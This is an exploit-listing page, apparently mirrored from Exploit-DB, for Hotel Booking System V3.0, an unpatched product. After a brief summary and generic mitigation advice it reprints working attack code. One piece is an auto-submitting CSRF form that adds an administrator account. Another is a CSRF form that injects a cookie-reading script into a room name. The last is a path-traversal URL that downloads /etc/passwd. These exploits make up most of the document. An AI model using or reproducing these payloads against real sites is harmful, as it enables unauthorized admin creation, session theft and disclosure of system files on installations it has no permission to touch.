header-logo
Suggest Exploit
vendor:
Hotels Booking System
by:
HackXBack
8,8
CVSS
HIGH
Cross Site Request Forgery, Cross Site Scripting, Local File disclure
352, 79, 200
CWE
Product Name: Hotels Booking System
Affected Version From: V3.0
Affected Version To: V3.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Hotel Booking System V3.0 – Multiple Vulnerabilties

The first vulnerability is a Cross Site Request Forgery (CSRF) vulnerability which allows an attacker to add an admin user to the system. The second vulnerability is a Cross Site Scripting (XSS) vulnerability which allows an attacker to inject malicious JavaScript code into the system. The third vulnerability is a Local File disclure vulnerability which allows an attacker to download sensitive files from the system.

Mitigation:

The application should implement a CSRF token to prevent CSRF attacks. The application should also validate user input to prevent XSS attacks. The application should also restrict access to sensitive files.
Source

Exploit-DB raw data:

Hotel Booking System V3.0 - Multiple Vulnerabilties
====================================================================

####################################################################
.:. Author         : HackXBack
.:. Contact        : h-b@usa.com
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://www.phpjabbers.com/hotels-booking-system/
####################################################################

===[ Exploit ]===

[1] Cross Site Request Forgery
==============================

[Add Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=pjAdminUsers&action=pjActionCreate">
<input type="hidden" name="user_create" value="1"/>
<input type="hidden" name="role_id" value="1"/>
<input type="hidden" name="email" value="Email@hotmail.com"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="name" value="Iphobos"/>
<input type="hidden" name="status" value="T"/>
</form>
</body>
</html

[2] Cross Site Scripting
========================

# CSRF with XSS Exploit:


<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0"
action="site/index.php?controller=pjAdminRooms&action=pjActionCreate">
<input type="hidden" name="room_create" value="1"/>
<input type="hidden" name="i18n[1][name]"
value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="i18n[3][name]" value=""/>
<input type="hidden" name="i18n[2][name]" value=""/>
<input type="hidden" name="i18n[1][description]" value="Iphobos"/>
<input type="hidden" name="i18n[3][description]" value=""/>
<input type="hidden" name="i18n[2][description]" value=""/>
<input type="hidden" name="adults" value="1"/>
<input type="hidden" name="children" value="0"/>
<input type="hidden" name="cnt" value="1"/>
</form>
</body>
</html>


[3] Local File disclure
========================

http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd

####################################################################